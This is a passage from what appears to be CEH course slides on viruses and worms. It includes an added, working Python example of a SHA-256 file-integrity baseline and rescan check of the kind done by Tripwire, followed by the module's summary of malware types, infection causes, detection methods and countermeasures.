    Step 14: Sanitize the complete infected system. You should remove virus infections from your system by using the latest updated antivirus software.
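    A worked example of the file and folder integrity check behind steps 10 and 11, added here and not part of the module nor of FCIV or TRIPWIRE themselves: it hashes a known-good directory tree into a SHA-256 baseline, stores the baseline outside the tree, and diffs a later rescan against it to list added, removed and modified files. The directory names, file contents and the "tampering" in the demo are constructed; on a real system you would baseline the OS and data directories while the machine is known-good and rescan when infection is suspected.

```python
"""Added example (not from the CEH module): a minimal file and folder
integrity check of the kind FCIV and Tripwire perform in steps 10 and 11.
Build a SHA-256 baseline of a known-good directory tree, store it as JSON,
and compare a later rescan against it to list added, removed and modified
files. Directory and file names below are constructed for the demo.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """SHA-256 hex digest of one file, read in chunks so large files fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map every regular file under root (POSIX-style relative path) to its digest."""
    baseline: dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            if full.is_symlink() or not full.is_file():
                continue  # symlinks and special files are not hashed
            baseline[full.relative_to(root).as_posix()] = hash_file(full)
    return baseline


def save_baseline(baseline: dict[str, str], store: Path) -> None:
    """Persist the baseline; keep the store outside the tree it describes."""
    store.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(store: Path) -> dict[str, str]:
    """Read a baseline written by save_baseline."""
    return json.loads(store.read_text())


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Diff two scans. A 'modified' entry under an OS directory is what step 11 looks for."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: take a baseline, alter the tree, rescan and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "fs"              # the tree being monitored (constructed)
        store = Path(tmp) / "baseline.json"  # baseline stored outside that tree
        (root / "system32").mkdir(parents=True)
        (root / "system32" / "kernel.dll").write_bytes(b"original library bytes")
        (root / "notes.txt").write_text("data file")
        (root / "unchanged.txt").write_text("stays the same")
        save_baseline(build_baseline(root), store)

        # Simulated infection: one OS file altered, one file dropped, one file deleted.
        (root / "system32" / "kernel.dll").write_bytes(b"original library bytes + patched")
        (root / "dropped.exe").write_bytes(b"MZ...")
        (root / "notes.txt").unlink()

        return compare(load_baseline(store), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

    The baseline must be stored off the monitored tree (and ideally off the machine, or signed), because malware that can alter kernel.dll can just as easily rewrite a baseline sitting next to it; that is the same reason the slide suggests comparing against a backup copy.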
  • 105. Module Summary
    □ A virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes, whereas worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction.
    □ Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met.
    □ Viruses are categorized according to the file they infect and the way they work.
    □ The lifecycle of viruses and worms includes the designing, replication, launching, detection, incorporation, and elimination stages.
    □ A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating and not installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without properly checking the source.
    □ Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used to create malware without any technical knowledge.
  • 106. Module Summary (Cont'd)
    □ Virus detection methods include system scanning, file integrity checking, and monitoring OS requests.
    □ Virus and worm countermeasures include installing antivirus software and following antivirus policies for safe computing.
